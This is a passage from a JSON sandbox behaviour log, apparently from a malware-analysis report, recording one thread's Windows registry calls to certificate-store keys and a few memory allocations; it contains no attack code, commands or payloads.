                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1767
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1768
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\SmartCardRoot"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot"
              }
            ],
            "repeated": 0,
            "id": 1769
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1770
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores"
              }
            ],
            "repeated": 0,
            "id": 1771
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1772
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bb703e",
            "parentcaller": "0x7ffee0bba69a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1773
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1774
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bb5d0c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": ""
              },
              {
                "name": "Handle",
                "value": "0x00000578"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\"
              }
            ],
            "repeated": 0,
            "id": 1775
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1776
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d71000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1777
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores"
              }
            ],
            "repeated": 0,
            "id": 1778
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba4dc",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\EnterpriseCertificates\\CA"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1779
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bb703e",
            "parentcaller": "0x7ffee0bba69a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1780
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0bba9de",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\EnterpriseCertificates\\CA"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1781
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0bb5d0c",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": ""
              },
              {
                "name": "Handle",
                "value": "0x0000057c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\"
              }
            ],
            "repeated": 0,
            "id": 1782
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbab7c",
            "parentcaller": "0x7ffee0bb7e1f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1783
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9fead",
            "parentcaller": "0x7ffee0b9ed36",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "AutoFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags"
              }
            ],
            "repeated": 0,
            "id": 1784
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d74000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1785
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9f774",
            "parentcaller": "0x7ffee0b9de30",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "DisableAutoFlushProcessNameList"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList"
              }
            ],
            "repeated": 0,
            "id": 1786
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9fead",
            "parentcaller": "0x7ffee0b9ed92",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "AutoFlushFirstDeltaSeconds"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds"
              }
            ],
            "repeated": 0,
            "id": 1787
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9fead",
            "parentcaller": "0x7ffee0b9edbe",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "AutoFlushNextDeltaSeconds"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds"
              }
            ],
            "repeated": 0,
            "id": 1788
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0ba1c01",
            "parentcaller": "0x7ffee0ba2286",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1789
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000056c"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1790
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1791
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1792
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1793
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000570"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1794
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1795
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1796
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1797
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0b9e956",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1798
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1799
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1800
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1801
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1802
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0b9e9e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1803
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000574"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1804
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1805
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1806
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1807
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacca2",
            "parentcaller": "0x7ffee0b9eaa9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000578"
              },
              {
                "name": "SubKey",
                "value": "Certificates"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates"
              }
            ],
            "repeated": 0,
            "id": 1808
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ead7",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1809
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ecc8",
            "parentcaller": "0x7ffee0b9ebb9",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "108FBF794E18EC5347A414E4370CC4506C297AB2"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2"
              }
            ],
            "repeated": 0,
            "id": 1810
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1811
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bacd4d",
            "parentcaller": "0x7ffee0b9e956",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x0003001f",
                "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1812
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
